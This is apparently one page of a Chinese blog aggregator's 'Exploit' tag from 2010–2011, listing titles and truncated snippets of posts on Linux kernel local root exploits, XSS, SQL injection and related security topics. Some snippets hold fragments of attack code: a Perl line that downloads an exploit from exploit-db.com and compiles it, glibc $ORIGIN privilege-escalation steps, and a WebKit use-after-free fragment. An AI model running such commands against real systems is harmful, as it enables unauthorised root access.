Exploit

Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit

  -  /* *sigaltstack-leak.c * *LinuxKernel *http://jon.oberheide.org * *Information: * *  http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 * *  UlrichDreppercorrectlypointsoutthatt
houwenhui·2011-05-18 15:30

Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit

/* *cve-2005-4605.c * *LinuxKernel *http://jon.oberheide.org * *Information: * *  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 * *  Theprocfscode(proc_misc.c)inLinux2.6.14.3andothervers
houwenhui·2011-05-18 15:13

Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit

/* ::KristianHermansen:: Date:20070229 Description:LocalattackercaninfluenceApachetodirectcommands  intoanopenttyownedbyuserwhostartedapacheprocess,usuallyroot.  Thisresultsinarbitrarycommandexecution
houwenhui·2011-05-18 15:30

Ubuntu PAM MOTD File Tampering (Privilege Escalation)

/bin/sh##ExploitTitle:UbuntuPAMMOTDfiletampering(privilegeescalation)#Date:July7,2010#Author:KristianErikHermansen
houwenhui·2011-05-18 14:58

Ubuntu PAM MOTD Local Root Exploit

/bin/bash##ExploitTitle:UbuntuPAMMOTDlocalroot#Date:July9,2010#Author:Anonymous#SoftwareLink:http://packages.ubuntu.com
houwenhui·2011-05-18 14:02

Linux Kernel 2.6.32 Local Root Exploit (x86_64)

#define_GNU_SOURCE#include#include#include#include#defineKSYM_NAME_LEN127structsym_entry{unsignedlonglongaddr;unsignedintlen;unsignedchar*sym;};staticstructsym_entry*table;staticunsignedinttable_size,
houwenhui·2011-05-18 14:43

linux非交互环境下本地提权思路与反思 linux localroot exploit

在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linuxlocalrootexploit也能实现,实战出真知。另外有些时候不一定
houwenhui·2011-05-18 14:49

Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit

/* *pwned.c-linux2.4and2.6sys_useliblocalrootexploit.PRIVATE.
houwenhui·2011-05-18 14:37

Exploit Sites (Exploit发布站点收集帖)

http://packetstormsecurity.nl/http://hack.com.ru/http://www.hackcoza.tk/http://www.web-hack.ru/http://www.securiteam.com/http://www.security.nnov.ru/http://www.hackerzhell.co.uk/indexmain.phphttp://ha
yatere·2011-05-14 03:00

cygwin编译linux C程序

常见溢出网址:-Google.com -Securiteam.com -K-otik.com -Astalavista.box.sk -Coromputer.net -Securityfocus.com (搜索exploit
yatere·2011-05-14 03:00

Shellcodes是如何工作的

译者注:现在对exploit翻译的文章已经很多了,本文为作者锻炼翻译能力的作品,因此对于其学习价值请不要太多计较,因为我也不知道什么样的文章才受欢迎,呵呵。
yatere·2011-05-14 03:00

S-ON非白卡机福音Incredible S 临时取得root权限方法

PsneuterexploitisworkingonIS,butbecause/systemislockedons-onphones,wecan'tcopysuandsuperuser.apkinto/
cai75951577·2011-05-13 21:00

渗透测试人员汇编资源[墙外]

 BelowaretheusefulresourcestolearnAssembleyLanguageforpentesterstostartlearningExploitwritinghttp://www.skullsecurity.org
hackfreer·2011-05-13 12:14

用python写exploit

 测试软件漏洞时,个人比较钟爱用python来完成exploit,简单,快速。也见过不少用perl来写的,我不喜欢。随便记录一些常用的方法。
hackfreer·2011-05-09 17:35

用python写exploit

测试软件漏洞时,个人比较钟爱用python来完成exploit,简单,快速。也见过不少用perl来写的,我不喜欢。随便记录一些常用的方法。
hackfreer·2011-05-09 17:35

linux本地自动溢出获取root权限工具

/getroot.pl{system("wget-O15704http://www.exploit-db.com/download/15704");system("gcc-w15704.c-o15704
houwenhui·2011-05-04 13:59

phpGraphy 0.9.13b XSS

exploit-db.com上看到,小看了下VulnerabilityID:HTB22958Reference:http://www.htbridge.ch/advisory/xss_in_phpgraphy.htmlProduct
upfont·2011-05-01 15:00

phpGraphy 0.9.13b XSS

exploit-db.com上看到,小看了下VulnerabilityID:HTB22958Reference:http://www.htbridge.ch/advisory/xss_in_phpgraphy.htmlProduct
upfont·2011-05-01 15:00

wireless crack

更新版的驱动(可以处于监听模式) + 抓包软件(Omnipeek) + WEP破解软件(winaircrack、aircrack-ng for win等) http://blog.csdn.net/freexploit
wlcxx98·2011-04-27 09:00

WebKit Use-After-Free Exploit 受影响版本:2.0 ,2.1, 2.1.1

functionheap(){varid=document.getElementById(“target”);varattribute=id.getAttributeNode(‘id’);nodes=attribute.childNodes;document.body.removeChild(id);attribute.removeChild(nodes[0]);setTimeout(functi
enables·2011-04-25 23:04

IRC

Xubuntu(GTK+)Kubuntu(Qt)ConsolebasedOtheroperatingsystemsChannelsBotsLogBotsubottuRegistrationOperatorsDCCexploit
xiaojianpitt·2011-04-24 21:00

.* Local root Exploit

  /*   freebsd mbufs() sendfile cache poisoning-priv escalation    x86/x64 local root xpl v2 by Kingcope   2010   --   tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and   7.2-RELEASE-p
hackfreer·2011-04-21 19:24

Analysis of LizaMoon: Stored XSS via SQL Injection

BlendedAttacksMoreandmoreoftoday'swebapplicationattacksareleveragingmultipleweaknesses,vulnerabilitiesandattackmethodsinordertoachieveadesiredexploitationoutcome.Itisbecomingmoreandmoredifficulttonea
hackfreer·2011-04-13 12:44

Analysis of LizaMoon: Stored XSS via SQL Injection

BlendedAttacksMoreandmoreoftoday'swebapplicationattacksareleveragingmultipleweaknesses,vulnerabilitiesandattackmethodsinordertoachieveadesiredexploitationoutcome.Itisbecomingmoreandmoredifficulttoneat
hackfreer·2011-04-13 12:44

Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit

 linux又爆一本地提权的漏洞,据之前的本地提权的漏洞时间很短啊···昨天还和朋友说起过,到底是windows安全还是linux安全?你说windows不安全,Microsoft用到现在也没啥大的问题,你说Linux安全,但又经常被一下子就到root了··所以说没有不安全的系统,只有不安全的人,最重要的还是用这操作系统的人,人才是安全的根本….附一个来自包子Blog的利用截图另附EXP: 
hackfreer·2011-04-08 21:20

Linux RDS Protocol Local Privilege Escalation

 http://www.vsecurity.com/download/tools/linux-rds-exploit.c  /*   * Linux Kernel    *   *
hackfreer·2011-04-08 21:42

普通用户tmp目录下越root权限

 以一个普通用户登录系统:用户:joker内核:#id$ls-ld/tmp/     #查看tmp目录权限1777$cd/tmp/      #进入tmp目录[tmp]$mkdirexploit  #建立一个
YgadYhtpi·2011-04-06 22:31

SQL注入攻击例子及Statement和PreparedStatement的比较

SQL injection is a technique that exploits a security vulnerability occurring in the database layer of
yizefeng·2011-03-31 16:00

对FCKEditor <= 2.6.4 通杀 exploit 的分析

 Author:handtsite    :upload/2011/3/201103240211173836.jpg”border=”0″small=”0″alt=”"/>0×01exploit使用演示在
hackfreer·2011-03-27 21:47

对 FCKEditor <= 2.6.4 通杀 exploit 的分析

 http://www.wooyun.org/bugs/wooyun-2010-01684http://hi.baidu.com/handt03/blog/item/a5269ced77e42d3260d09f6c.html
obnus·2011-03-22 23:49

PHP本地文件包含漏洞的新突破

www.exp.com/index.php这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:http://www.milw0rm.com/exploits
obnus·2011-03-20 10:30

oracle startup时 ORA-00600错误解决

From:http://oracle.chinaitlab.com/exploiture/721518.html oracle9startup时报错ORA-00600:内部错误代码,参数:[kcratr1
nomad2·2011-03-12 13:00

Java开发中容易产生Sql注入的原因以及避免方式

 SQLinjection isatechniquethatexploitsa securityvulnerability occurringinthe database layerofan application
wanqiufeng·2011-03-09 10:07

制作可保存配置的U盘版BT4(BackTrack4 )

一、安装1、准备:1).最小的USB驱动器的容量4GB的USB,格式为FAT32的;2).BT4正式版:下载地址:http://www.remote-exploit.org/backtrack_download.html3
ghoulvspol·2011-03-07 09:00

Top 13 SQL Scaners

SQLIer-SQLIertakesavulnerableURLandattemptstodetermineallthenecessaryinformationtoexploittheSQLInjectionvulnerabilitybyitself
hackfreer·2011-02-27 17:50

提权

$mkdir/tmp/exploit#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
715434211·2011-02-22 13:27

struts2的安全漏洞及解决办法

转自:http://www.iteye.com/topic/720209 exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。
merrymode·2011-02-21 10:00

ActiveX控件的保护技术之淘宝旺旺溢出分析

本文仅从反漏洞exploit、反调试和反逆向三个方面来阐述如何保护ActiveX控件的安全。
winsunxu·2011-02-20 15:00

Oracle 10/11g exp.exe Buffer Overflow

/usr/bin/python # Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit # Date found approx
hackfreer·2011-02-19 20:54

Oracle 10/11g exp.exe Buffer Overflow

/usr/bin/python  # Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit  # Date found
hackfreer·2011-02-19 20:54

提权

$mkdir/tmp/exploit#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
colinzhouyj·2011-02-11 11:36

提权

$mkdir/tmp/exploit#Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN.
colinzhouyj·2011-02-11 11:36

Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle

Ihadgatheredaninteresting collectionofquickmethodsofblindSQLInjection exploitation,butIwaslackinginasimilarmethodforanotherwidespreadDBMS
hackfreer·2011-01-17 12:34

Drive-By Download测试框架 - drivesploit

可实施Drive-ByDownload的综合性+工具相当多,大多都是傻瓜式的,如著名的Zeus,Phoenix等exploit套件,它们都具有较高的易用性和成功率,drivesploit
leeeryan·2011-01-12 09:00

《0day安全:软件漏洞分析技术第二版》

可以说我们在这次再版中逐一讲述并总结了目前世界上windows平台下几乎所有最前沿的内存exploit技术。时效性是再版的重要原因。 然后,第一版
leeeryan·2011-01-11 09:00

enlightenment提权的工具

/run_null_exploits.sh./run_null_exploits.sh 
lovejuan007·2011-01-10 11:56

基于栈溢出的EXPLOIT编写

声明:以下涉及的内容只作为学习的目的,任何因为滥用本篇内容而导致对个人或者企业组织造成危害,作者并不承担任何责任。◆目标软件EasyRMtoMP3Converter(版本2.7.3.700)◆辅助工具WinDbg6.12、Metasploit3.4.1、ActivePerl5.12◆漏洞描述通过创建一个恶意的.m3u文件将触发EasyRMtoMP3Converter(version2.7.3.70
yuzl32·2011-01-10 04:00

Linux2.6内核本地提权

提权步骤:  $ mkdir /tmp/exploit     # Link to an suid binary, thus changing the definition of $ORIGIN
王文华·2011-01-04 14:32

基于GNU glibc动态连接 提权

 编写这样一个脚本, mkdir /tmp/exploit  ln /bin/ping /tmp/exploit/target  exec 3> /tmp/payload.c <
charlie_long·2011-01-04 11:42

BackTrack 官网被黑 更新中

      BackTrack、exploitdb等网站被黑事件最新消息 首先给大家报个好消息 Ettercap工程源码并没有被植入后门下面是Ettercap主要开发人员AlbertoOrnaghi(ALoR
ilovecto·2010-12-29 11:10
上一页 42 43 44 45 46 47 48 49 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他